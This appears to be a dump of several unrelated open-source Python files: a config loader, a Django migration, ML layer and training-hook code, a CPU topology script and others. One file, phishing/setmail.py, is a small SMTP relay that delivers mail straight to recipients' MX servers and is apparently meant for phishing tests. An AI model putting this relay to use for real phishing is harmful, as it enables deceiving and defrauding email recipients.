if proto_name not in pmprotos:
pmodule = None
continue
if 'class' not in pmprotos[proto_name]:
pmodule = None
continue
return pmprotos[proto_name]
raise RuntimeError('Unable to load prototype %s: '
' not found' % (protoname))
def _load_config_from_file(f):
valid = True
config = yaml.safe_load(f)
if not isinstance(config, dict) and config is not None:
raise ValueError('Invalid config YAML type')
return valid, MineMeldConfig.from_dict(config)
def _load_and_validate_config_from_file(path):
valid = False
config = None
if os.path.isfile(path):
try:
with open(path, 'r') as cf:
valid, config = _load_config_from_file(cf)
if not valid:
LOG.error('Invalid config file {}'.format(path))
except (RuntimeError, IOError):
LOG.exception(
'Error loading config {}, config ignored'.format(path)
)
valid, config = False, None
if valid and config is not None:
valid = resolve_prototypes(config)
if valid and config is not None:
vresults = validate_config(config)
if len(vresults) != 0:
LOG.error('Invalid config {}: {}'.format(
path,
', '.join(vresults)
))
valid = False
return valid, config
def _destroy_node(change, installed_nodes=None, installed_nodes_gcs=None):
LOG.info('Destroying {!r}'.format(change))
destroyed_name = change.nodename
destroyed_class = change.nodeclass
if destroyed_class is None:
LOG.error('Node {} with no class destroyed'.format(destroyed_name))
return 1
# load node class GC from entry_point or from "gc" staticmethod of class
node_gc = None
mmep = installed_nodes_gcs.get(destroyed_class, None)
if mmep is None:
mmep = installed_nodes.get(destroyed_class, None)
try:
nodep = mmep.ep.load()
if hasattr(nodep, 'gc'):
node_gc = nodep.gc
except ImportError:
LOG.exception("Error checking node class {} for gc method".format(destroyed_class))
else:
try:
node_gc = mmep.ep.load()
except ImportError:
LOG.exception("Error resolving gc for class {}".format(destroyed_class))
if node_gc is None:
LOG.error('Node {} with class {} with no garbage collector destroyed'.format(
destroyed_name, destroyed_class
))
return 1
try:
node_gc(
destroyed_name,
config=change.detail.get('config', None)
)
except:
LOG.exception('Exception destroying old node {} of class {}'.format(
destroyed_name, destroyed_class
))
return 1
return 0
def _destroy_old_nodes(config):
# this destroys resources used by destroyed nodes
# a node has been destroyed if a node with the same
# name & class does not exist in the new config
# the case of a different node config but the same name
# and class is handled by the node itself
destroyed_nodes = [c for c in config.changes if c.change == CHANGE_DELETED]
LOG.info('Destroyed nodes: {!r}'.format(destroyed_nodes))
if len(destroyed_nodes) == 0:
return
installed_nodes = minemeld.loader.map(minemeld.loader.MM_NODES_ENTRYPOINT)
installed_nodes_gcs = minemeld.loader.map(minemeld.loader.MM_NODES_GCS_ENTRYPOINT)
dpool = multiprocessing.Pool()
_bound_destroy_node = functools.partial(
_destroy_node,
installed_nodes=installed_nodes,
installed_nodes_gcs=installed_nodes_gcs
)
dpool.imap_unordered(
_bound_destroy_node,
destroyed_nodes
)
dpool.close()
dpool.join()
dpool = None
def _load_config_from_dir(path):
ccpath = os.path.join(
path,
COMMITTED_CONFIG
)
rcpath = os.path.join(
path,
RUNNING_CONFIG
)
ccvalid, cconfig = _load_and_validate_config_from_file(ccpath)
rcvalid, rcconfig = _load_and_validate_config_from_file(rcpath)
if not rcvalid and not ccvalid:
# neither the running nor the candidate config is valid
print(
"At least one of", RUNNING_CONFIG,
"or", COMMITTED_CONFIG,
"should exist in", path,
file=sys.stderr
)
sys.exit(1)
elif rcvalid and not ccvalid:
# running is valid but candidate is not
return rcconfig
elif not rcvalid and ccvalid:
# candidate is valid while running is not
LOG.info('Switching to candidate config')
cconfig.compute_changes(rcconfig)
LOG.info('Changes in config: {!r}'.format(cconfig.changes))
_destroy_old_nodes(cconfig)
if rcconfig is not None:
shutil.copyfile(
rcpath,
'{}.{}'.format(rcpath, int(time.time()))
)
shutil.copyfile(ccpath, rcpath)
return cconfig
elif rcvalid and ccvalid:
LOG.info('Switching to candidate config')
cconfig.compute_changes(rcconfig)
LOG.info('Changes in config: {!r}'.format(cconfig.changes))
_destroy_old_nodes(cconfig)
shutil.copyfile(
rcpath,
'{}.{}'.format(rcpath, int(time.time()))
)
shutil.copyfile(ccpath, rcpath)
return cconfig
def _detect_cycles(nodes):
# use topological sorting (Kahn's algorithm) to detect cycles in the graph; see Wikipedia
graph = {}
S = set()
L = []
for n in nodes:
graph[n] = {
'inputs': [],
'outputs': []
}
for n, v in nodes.iteritems():
for i in v.get('inputs', []):
if i in graph:
graph[i]['outputs'].append(n)
graph[n]['inputs'].append(i)
for n, v in graph.iteritems():
if len(v['inputs']) == 0:
S.add(n)
while len(S) != 0:
n = S.pop()
L.append(n)
for m in graph[n]['outputs']:
graph[m]['inputs'].remove(n)
if len(graph[m]['inputs']) == 0:
S.add(m)
graph[n]['outputs'] = []
nedges = 0
for n, v in graph.iteritems():
nedges += len(v['inputs'])
nedges += len(v['outputs'])
return nedges == 0
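# Note: despite its name, _detect_cycles returns True when the graph is acyclic
# and False when a cycle exists, e.g. (illustrative inputs):
#     _detect_cycles({'a': {}, 'b': {'inputs': ['a']}}) -> True
#     _detect_cycles({'a': {'inputs': ['b']}, 'b': {'inputs': ['a']}}) -> False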
def resolve_prototypes(config):
# retrieve prototype dir from environment
# used for main library and local library
paths = os.getenv(PROTOTYPE_ENV, None)
if paths is None:
raise RuntimeError('Unable to load prototypes: %s '
'environment variable not set' %
(PROTOTYPE_ENV))
paths = paths.split(':')
# add prototype dirs from extension to paths
prototypes_entrypoints = minemeld.loader.map(minemeld.loader.MM_PROTOTYPES_ENTRYPOINT)
for epname, mmep in prototypes_entrypoints.iteritems():
if not mmep.loadable:
LOG.info('Prototypes entrypoint {} not loadable'.format(epname))
continue
try:
ep = mmep.ep.load()
# we add prototype paths in front, to let extensions override default protos
paths.insert(0, ep())
except:
LOG.exception(
'Exception retrieving path from prototype entrypoint {}'.format(epname)
)
# resolve all prototypes
valid = True
nodes_config = config.nodes
for _, nconfig in nodes_config.iteritems():
if 'prototype' in nconfig:
try:
nproto = _load_node_prototype(nconfig['prototype'], paths)
except RuntimeError as e:
LOG.error('Error loading prototype {}: {}'.format(
nconfig['prototype'],
str(e)
))
valid = False
continue
nconfig.pop('prototype')
nconfig['class'] = nproto['class']
nproto_config = nproto.get('config', {})
nproto_config.update(
nconfig.get('config', {})
)
nconfig['config'] = nproto_config
return valid
def validate_config(config):
result = []
nodes = config.nodes
for n in nodes.keys():
if re.match('^[a-zA-Z0-9_\-]+$', n) is None: # pylint:disable=W1401
result.append('%s node name is invalid' % n)
for n, v in nodes.iteritems():
for i in v.get('inputs', []):
if i not in nodes:
result.append('%s -> %s is unknown' % (n, i))
continue
if not nodes[i].get('output', False):
result.append('%s -> %s output disabled' %
(n, i))
installed_nodes = minemeld.loader.map(minemeld.loader.MM_NODES_ENTRYPOINT)
for n, v in nodes.iteritems():
nclass = v.get('class', None)
if nclass is None:
result.append('No class in {}'.format(n))
continue
mmep = installed_nodes.get(nclass, None)
if mmep is None:
result.append(
'Unknown node class {} in {}'.format(nclass, n)
)
continue
if not mmep.loadable:
result.append(
'Class {} in {} not safe to load'.format(nclass, n)
)
if not _detect_cycles(nodes):
result.append('loop detected')
return result
def load_config(config_path):
if os.path.isdir(config_path):
return _load_config_from_dir(config_path)
# this is just a file, as we can't do a delta
# we just load it and mark all the nodes as added
valid, config = _load_and_validate_config_from_file(config_path)
if not valid:
raise RuntimeError('Invalid config')
config.compute_changes(None)
return config
|
cvat/apps/engine/migrations/0049_auto_20220202_0710.py
|
ACHultman/cvat
| 4,197 |
75663
|
# Generated by Django 3.2.11 on 2022-02-02 07:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('engine', '0048_auto_20211112_1918'),
]
operations = [
migrations.AlterField(
model_name='labeledshape',
name='type',
field=models.CharField(choices=[('rectangle', 'RECTANGLE'), ('polygon', 'POLYGON'), ('polyline', 'POLYLINE'), ('points', 'POINTS'), ('ellipse', 'ELLIPSE'), ('cuboid', 'CUBOID')], max_length=16),
),
migrations.AlterField(
model_name='trackedshape',
name='type',
field=models.CharField(choices=[('rectangle', 'RECTANGLE'), ('polygon', 'POLYGON'), ('polyline', 'POLYLINE'), ('points', 'POINTS'), ('ellipse', 'ELLIPSE'), ('cuboid', 'CUBOID')], max_length=16),
),
]
|
Tutorials/01. 10 Days of Statistics/002. Day 0 - Weighted Mean.py
|
Snehakri022/HackerrankPractice
| 831 |
75671
|
# Problem: https://www.hackerrank.com/challenges/s10-weighted-mean/problem
# Score: 30
n = int(input())
arr = list(map(int, input().split()))
weights = list(map(int, input().split()))
print(round(sum([arr[x]*weights[x] for x in range(len(arr))]) / sum(weights), 1))
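# Worked example with illustrative numbers:
# arr = [10, 40, 30, 50, 20], weights = [1, 2, 3, 4, 5]
# weighted mean = (10*1 + 40*2 + 30*3 + 50*4 + 20*5) / (1 + 2 + 3 + 4 + 5)
#               = 480 / 15 = 32.0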
|
propeller/paddle/data/feature_column.py
|
JZZ-NOTE/ERNIE
| 3,712 |
75696
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""FeatureColumns and many Column"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import os
import sys
import struct
from six.moves import zip, map
import itertools
import gzip
from functools import partial
import six
import logging
import numpy as np
from glob import glob
from propeller.data.feature_column import FeatureColumns as FCBase
from propeller.paddle.data.functional import Dataset
import multiprocessing
log = logging.getLogger(__name__)
__all__ = ['FeatureColumns']
class FeatureColumns(FCBase):
"""A Dataset Factory object"""
def build_dataset(self, *args, **kwargs):
"""
build `Dataset` from `data_dir` or `data_file`
if `use_gz` is set, data files will be converted to gz format and saved to `gz_dir`; if `gz_dir` is not given, one will be created.
"""
ds = super(FeatureColumns, self).build_dataset(*args, **kwargs)
ds.__class__ = Dataset
return ds
def build_dataset_from_stdin(self, *args, **kwargs):
"""doc"""
ds = super(FeatureColumns, self).build_dataset_from_stdin(*args,
**kwargs)
ds.__class__ = Dataset
return ds
|
mealie/db/models/model_base.py
|
danielpalstra/mealie
| 1,927 |
75719
|
<reponame>danielpalstra/mealie<filename>mealie/db/models/model_base.py
import sqlalchemy.ext.declarative as dec
from sqlalchemy.orm.session import Session
SqlAlchemyBase = dec.declarative_base()
class BaseMixins:
def update(self, *args, **kwarg):
self.__init__(*args, **kwarg)
@classmethod
def get_ref(cls_type, session: Session, match_value: str, match_attr: str = "id"):
eff_ref = getattr(cls_type, match_attr)
return session.query(cls_type).filter(eff_ref == match_value).one_or_none()
|
test/resource/test_data/suite_tree/LibraryWithReallyTooLongName.py
|
jimpriest/sublime-robot-framework-assistant
| 103 |
75730
|
<filename>test/resource/test_data/suite_tree/LibraryWithReallyTooLongName.py
from robot.api.deco import keyword
class LibraryWithReallyTooLongName(object):
def long_name_keyword(self, *args):
"""Documentation goes here"""
print args
def other_long_name_keyword(self, *args, **kwargs):
"""Other documentation goes here"""
print args, kwargs
@keyword(name='Other Name Here')
def not_name(self, arg):
"""def not_name kw name Other Name Here"""
print arg
@keyword(name='Other ${arg1} and ${arg2} Too')
def keyword_deco(self, arg1, arg2):
"""lib keyword with emmedded args"""
print arg1, arg2
|
phishing/setmail.py
|
m00tiny/scripts
| 877 |
75741
|
<filename>phishing/setmail.py
#!/usr/bin/env python
# Copyright (c) 2012, AverageSecurityGuy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of AverageSecurityGuy nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
import smtpd
import smtplib
import asyncore
import dns.resolver
port = 2525
debug = False
def get_mx_record(domain):
records = dns.resolver.query(domain, 'MX')
return str(records[0].exchange)
class CustomSMTPServer(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
for rcptto in rcpttos:
print '[*] Sending message to {0}.'.format(rcptto)
domain = rcptto.split('@')[1]
mx = get_mx_record(domain)
try:
server = smtplib.SMTP(mx, 25)
if debug:
server.set_debuglevel(True)
server.sendmail(mailfrom, rcptto, data)
except smtplib.SMTPDataError as e:
print '[-] {0}'.format(str(e[1]))
except smtplib.SMTPServerDisconnected as e:
print '[-] {0}'.format(str(e))
except smtplib.SMTPConnectError as e:
print '[-] {0}'.format(str(e[1]))
server = CustomSMTPServer(('127.0.0.1', port), None)
print '[+] Server listening on port {0}'.format(port)
asyncore.loop()
|
libmoon/deps/dpdk/usertools/cpu_layout.py
|
anonReview/Implementation
| 287 |
75746
|
<gh_stars>100-1000
#!/usr/bin/env python
#
# BSD LICENSE
#
# Copyright(c) 2010-2014 Intel Corporation. All rights reserved.
# Copyright(c) 2017 Cavium, Inc. All rights reserved.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import print_function
import sys
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
sockets = []
cores = []
core_map = {}
base_path = "/sys/devices/system/cpu"
fd = open("{}/kernel_max".format(base_path))
max_cpus = int(fd.read())
fd.close()
for cpu in xrange(max_cpus + 1):
try:
fd = open("{}/cpu{}/topology/core_id".format(base_path, cpu))
except IOError:
continue
except:
break
core = int(fd.read())
fd.close()
fd = open("{}/cpu{}/topology/physical_package_id".format(base_path, cpu))
socket = int(fd.read())
fd.close()
if core not in cores:
cores.append(core)
if socket not in sockets:
sockets.append(socket)
key = (socket, core)
if key not in core_map:
core_map[key] = []
core_map[key].append(cpu)
print(format("=" * (47 + len(base_path))))
print("Core and Socket Information (as reported by '{}')".format(base_path))
print("{}\n".format("=" * (47 + len(base_path))))
print("cores = ", cores)
print("sockets = ", sockets)
print("")
max_processor_len = len(str(len(cores) * len(sockets) * 2 - 1))
max_thread_count = len(list(core_map.values())[0])
max_core_map_len = (max_processor_len * max_thread_count) \
+ len(", ") * (max_thread_count - 1) \
+ len('[]') + len('Socket ')
max_core_id_len = len(str(max(cores)))
output = " ".ljust(max_core_id_len + len('Core '))
for s in sockets:
output += " Socket %s" % str(s).ljust(max_core_map_len - len('Socket '))
print(output)
output = " ".ljust(max_core_id_len + len('Core '))
for s in sockets:
output += " --------".ljust(max_core_map_len)
output += " "
print(output)
for c in cores:
output = "Core %s" % str(c).ljust(max_core_id_len)
for s in sockets:
if (s,c) in core_map:
output += " " + str(core_map[(s, c)]).ljust(max_core_map_len)
else:
output += " " * (max_core_map_len + 1)
print(output)
|
mmdet/core/my_mmcv/runner/hooks/mean_teacher_optimizer.py
|
Ernstsen/Pedestron
| 594 |
75750
|
<filename>mmdet/core/my_mmcv/runner/hooks/mean_teacher_optimizer.py
from torch.nn.utils import clip_grad
from mmcv.runner.hooks.hook import Hook
class OptimizerHook(Hook):
def __init__(self, grad_clip=None, mean_teacher=None):
self.grad_clip = grad_clip
self.mean_teacher = mean_teacher
def clip_grads(self, params):
clip_grad.clip_grad_norm_(
filter(lambda p: p.requires_grad, params), **self.grad_clip)
def after_train_iter(self, runner):
runner.optimizer.zero_grad()
runner.outputs['loss'].backward()
if self.grad_clip is not None:
self.clip_grads(runner.model.parameters())
runner.optimizer.step()
# mean teacher: update teacher weights as an EMA of the student weights
if self.mean_teacher:
for k, v in runner.model.module.state_dict().items():
if k.find('num_batches_tracked') == -1:
runner.teacher_dict[k] = self.mean_teacher.alpha * runner.teacher_dict[k] + (1 - self.mean_teacher.alpha) * v
else:
runner.teacher_dict[k] = 1 * v
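# Note: the update above is an exponential moving average (EMA) of the student
# weights. For a single weight with alpha = 0.99 it reads
#     teacher_new = 0.99 * teacher_old + 0.01 * student
# while the `num_batches_tracked` counters are copied from the student directly.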
|
code/models/layers.py
|
tchittesh/EAS-
| 169 |
75772
|
<gh_stars>100-1000
from models.basic_model import BasicModel
import tensorflow as tf
import numpy as np
import copy
def apply_noise(weights, noise_config):
if noise_config is None:
return weights
noise_type = noise_config.get('type', 'normal')
if noise_type == 'normal':
ratio = noise_config.get('ratio', 1e-3)
std = np.std(weights)
noise = np.random.normal(0, std * ratio, size=weights.shape)
elif noise_type == 'uniform':
ratio = noise_config.get('ratio', 1e-3)
mean, _max = np.mean(weights), np.max(weights)
width = (_max - mean) * ratio
noise = np.random.uniform(-width, width, size=weights.shape)
else:
raise NotImplementedError
return weights + noise
def get_layer_by_name(name):
if name == 'conv':
return ConvLayer
elif name == 'fc':
return FCLayer
elif name == 'pool':
return PoolLayer
else:
raise ValueError('Unknown layer type: %s' % name)
def get_magnifier(old_size, indices):
_l = np.zeros(old_size)
for x in indices:
_l[x] += 1
magnifier = (1.0 / _l)[indices]
return magnifier
def get_random_remapping(old_size, new_size):
base = np.arange(old_size)
indices = np.concatenate([base, np.random.choice(base, new_size - old_size)])
magnifier = get_magnifier(old_size, indices)
return indices, magnifier
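# Worked example with illustrative numbers: widening a layer from 2 to 4 units
# might draw indices = [0, 1, 1, 0]; each original unit is then replicated
# twice, so get_magnifier returns [0.5, 0.5, 0.5, 0.5], which the next layer
# uses in prev_widen to rescale its incoming weights and preserve the network
# function (the Net2Net 'wider' operator).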
class BaseLayer:
"""
_id, batch normalization, activation, dropout, ready
"""
def __init__(self, _id, use_bn=True, activation='relu', keep_prob=1.0, ready=True, pre_activation=True):
self._id = _id
self.use_bn = use_bn
self.activation = activation
self.keep_prob = keep_prob
self.ready = ready
self.pre_activation = pre_activation
self._scope = None
self._init = None
self.output_op = None
@property
def id(self): return self._id
@id.setter
def id(self, value): self._id = value
@property
def init(self):
return self._init
@property
def param_initializer(self):
if self._init is None:
return None
param_initializer = {}
for key in self.variable_list.keys():
if self._init[key] is not None:
param_initializer[key] = tf.constant_initializer(self._init[key])
if len(param_initializer) == 0:
param_initializer = None
return param_initializer
def renew_init(self, net: BasicModel):
if net is None:
return copy.deepcopy(self._init)
self._init = {}
for key, var_name in self.variable_list.items():
var = net.graph.get_tensor_by_name('%s/%s' % (self._scope, var_name))
self._init[key] = net.sess.run(var)
if len(self._init) == 0:
self._init = None
return copy.deepcopy(self._init)
def copy(self):
return self.set_from_config(self.get_config(), layer_init=copy.deepcopy(self._init))
def get_config(self):
return {
'_id': self.id,
'use_bn': self.use_bn,
'activation': self.activation,
'keep_prob': self.keep_prob,
'pre_activation': self.pre_activation,
}
@property
def variable_list(self):
"""
beta: mean scale
gamma: variance scale
y = gamma * (x - moving_mean) / sqrt(epsilon + moving_variance) + beta
"""
if self.use_bn:
return {
'moving_mean': 'BatchNorm/moving_mean:0',
'moving_variance': 'BatchNorm/moving_variance:0',
'beta': 'BatchNorm/beta:0',
'gamma': 'BatchNorm/gamma:0',
}
else:
return {}
@staticmethod
def set_from_config(layer_config, layer_init):
raise NotImplementedError
def build(self, _input, net, store_output_op):
raise NotImplementedError
def prev_widen(self, indices, magnifier, noise=None):
raise NotImplementedError
def set_identity_layer(self, strict, param, noise):
raise NotImplementedError
def widen_bn(self, indices, magnifier, noise=None):
if self.use_bn:
self._init['beta'] = self._init['beta'][indices]
self._init['gamma'] = self._init['gamma'][indices]
self._init['moving_mean'] = self._init['moving_mean'][indices]
self._init['moving_variance'] = self._init['moving_variance'][indices]
def set_bn_identity(self, strict=True, param=None, noise=None):
if self.use_bn:
if strict:
self._init['moving_mean'] = param['moving_mean']
self._init['moving_variance'] = param['moving_variance']
self._init['beta'] = self._init['moving_mean']
self._init['gamma'] = np.sqrt(self._init['moving_variance'] + param['epsilon'])
else:
# use default initialization for batch normalization layer
self._init['moving_mean'], self._init['moving_variance'] = None, None
self._init['beta'], self._init['gamma'] = None, None
class ConvLayer(BaseLayer):
def __init__(self, _id, filter_num, kernel_size=3, strides=1,
use_bn=True, activation='relu', keep_prob=1.0, ready=True, pre_activation=True, **kwargs):
BaseLayer.__init__(self, _id, use_bn, activation, keep_prob, ready, pre_activation)
self.filter_num = filter_num
self.kernel_size = kernel_size
self.strides = strides
@property
def layer_str(self):
return 'C%d,%d,%d' % (self.filter_num, self.kernel_size, self.strides)
@property
def variable_list(self):
var_list = {'kernel': 'kernel:0'}
var_list.update(super(ConvLayer, self).variable_list)
return var_list
def get_config(self):
return {
'name': 'conv',
'filter_num': self.filter_num,
'kernel_size': self.kernel_size,
'strides': self.strides,
**super(ConvLayer, self).get_config(),
}
@staticmethod
def set_from_config(layer_config, layer_init=None):
conv_layer = ConvLayer(**layer_config)
conv_layer._init = layer_init
return conv_layer
def build(self, _input, net: BasicModel, store_output_op=False):
output = _input
if not self.ready:
return output
with tf.variable_scope(self._id):
self._scope = tf.get_variable_scope().name
param_initializer = self.param_initializer
if self.pre_activation:
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# convolutional
output = BasicModel.conv2d(output, self.filter_num, self.kernel_size, self.strides,
param_initializer=param_initializer)
else:
# convolutional
output = BasicModel.conv2d(output, self.filter_num, self.kernel_size, self.strides,
param_initializer=param_initializer)
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# dropout
output = BasicModel.dropout(output, self.keep_prob, net.is_training)
if store_output_op:
self.output_op = output
return output
def widen_filters(self, new_filter_num, noise=None):
"""
Increase the filter number of a conv layer while preserving the functionality
Proposed in 'Net2Net': https://arxiv.org/abs/1511.05641
"""
assert new_filter_num > self.filter_num, 'Invalid new filter number: %d' % new_filter_num
assert self._init is not None, 'Uninitialized layer'
old_size, new_size = self.filter_num, new_filter_num
indices, magnifier = get_random_remapping(old_size, new_size)
# more filters
self.filter_num = new_filter_num
new_kernel = self._init['kernel'][:, :, :, indices]
new_kernel[:, :, :, old_size:] = apply_noise(new_kernel[:, :, :, old_size:], noise.get('wider'))
self._init['kernel'] = new_kernel
if not self.pre_activation:
# widen batch norm variables if use batch norm
self.widen_bn(indices, magnifier, noise=noise)
return indices, magnifier
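# A small worked example of the widening above (hedged: it assumes get_random_remapping,
# defined elsewhere in this repo, keeps the original filters first and then repeats randomly
# chosen ones, with magnifier[i] = 1 / (number of copies of indices[i])): widening from 2 to 3
# filters might give indices = [0, 1, 0] and magnifier = [0.5, 1.0, 0.5]. This layer copies
# kernel column 0 into the new third filter, and the next layer (via prev_widen below) gathers
# its input channels with the same indices and multiplies them by magnifier, so the duplicated
# channel contributes 0.5 + 0.5 = 1 times its original output and the network function is
# preserved, as in Net2Net.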
def prev_widen(self, indices, magnifier, noise=None):
assert self._init is not None, 'Uninitialized layer'
# rescale kernel
self._init['kernel'] = self._init['kernel'][:, :, indices, :] * magnifier.reshape([1, 1, -1, 1])
if self.pre_activation:
self.widen_bn(indices, magnifier, noise=noise)
def set_identity_layer(self, strict=True, param=None, noise=None):
self._init = {}
self.set_bn_identity(strict, param, noise=noise)
mid = self.kernel_size // 2
self._init['kernel'] = np.zeros([self.kernel_size, self.kernel_size, self.filter_num, self.filter_num])
self._init['kernel'][mid, mid] = np.eye(self.filter_num)
self._init['kernel'] = apply_noise(self._init['kernel'], noise.get('deeper'))
self.ready = True
def remap(self, indices, noise=None):
self.filter_num = len(indices)
self._init['kernel'] = self._init['kernel'][:, :, :, indices]
self._init['kernel'] = apply_noise(self._init['kernel'], noise.get('wider'))
if not self.pre_activation:
self.widen_bn(indices, None, noise=noise)
return self
class FCLayer(BaseLayer):
def __init__(self, _id, units, use_bn=True, use_bias=False, activation='relu', keep_prob=1.0, ready=True,
pre_activation=False, **kwargs):
BaseLayer.__init__(self, _id, use_bn, activation, keep_prob, ready, pre_activation)
self.units = units
self.use_bias = use_bias
@property
def layer_str(self):
return 'FC%d' % self.units
@property
def variable_list(self):
var_list = {'W': 'W:0'}
if self.use_bias:
var_list['bias'] = 'bias:0'
var_list.update(super(FCLayer, self).variable_list)
return var_list
def get_config(self):
return {
'name': 'fc',
'units': self.units,
'use_bias': self.use_bias,
**super(FCLayer, self).get_config(),
}
@staticmethod
def set_from_config(layer_config, layer_init=None):
fc_layer = FCLayer(**layer_config)
fc_layer._init = layer_init
return fc_layer
def build(self, _input, net: BasicModel, store_output_op=False):
output = _input
if not self.ready:
return output
with tf.variable_scope(self._id):
self._scope = tf.get_variable_scope().name
param_initializer = self.param_initializer
# flatten if not
output = BasicModel.flatten(output)
if self.pre_activation:
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# FC
output = BasicModel.fc_layer(output, self.units, self.use_bias, param_initializer=param_initializer)
else:
# FC
output = BasicModel.fc_layer(output, self.units, self.use_bias, param_initializer=param_initializer)
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# dropout
output = BasicModel.dropout(output, self.keep_prob, net.is_training)
if store_output_op:
self.output_op = output
return output
def widen_units(self, new_units_num, noise=None):
"""
Increase the units number of a fc layer while preserving the functionality
Proposed in 'Net2Net': https://arxiv.org/abs/1511.05641
W: [in_dim, out_units]
bias: [out_units]
"""
assert new_units_num > self.units, 'Invalid new units number: %d' % new_units_num
assert self._init is not None, 'Uninitialized layer'
old_size, new_size = self.units, new_units_num
indices, magnifier = get_random_remapping(old_size, new_size)
# more units
self._init['W'] = self._init['W'][:, indices]
self._init['W'][:, old_size:] = apply_noise(self._init['W'][:, old_size:], noise.get('wider'))
self.units = new_units_num
# widen bias variable if exist
if self.use_bias:
self._init['bias'] = self._init['bias'][indices]
self._init['bias'][old_size:] = apply_noise(self._init['bias'][old_size:], noise.get('wider'))
if not self.pre_activation:
# widen batch norm variables if use batch norm
self.widen_bn(indices, magnifier, noise=noise)
return indices, magnifier
def prev_widen(self, indices, magnifier, noise=None):
assert self._init is not None, 'Uninitialized layer'
# rescale W
self._init['W'] = self._init['W'][indices] * magnifier.reshape([-1, 1])
if self.pre_activation:
self.widen_bn(indices, magnifier, noise=noise)
def set_identity_layer(self, strict=True, param=None, noise=None):
self._init = {}
self.set_bn_identity(strict, param, noise=noise)
if self.use_bias:
self._init['bias'] = [0.0] * self.units
self._init['W'] = np.eye(self.units)
self._init['W'] = apply_noise(self._init['W'], noise.get('deeper'))
self.ready = True
def remap(self, indices, noise=None):
self.units = len(indices)
self._init['W'] = self._init['W'][:, indices]
self._init['W'] = apply_noise(self._init['W'], noise.get('wider'))
if self.use_bias:
self._init['bias'] = self._init['bias'][indices]
if not self.pre_activation:
self.widen_bn(indices, None, noise=noise)
return self
class PoolLayer(BaseLayer):
def __init__(self, _id, _type, kernel_size=2, strides=2, use_bn=False, activation=None, keep_prob=1.0,
ready=True, pre_activation=True, **kwargs):
BaseLayer.__init__(self, _id, use_bn, activation, keep_prob, ready, pre_activation)
self._type = _type
self.kernel_size = kernel_size
self.strides = strides
@property
def layer_str(self):
return 'P%d,%d' % (self.kernel_size, self.strides)
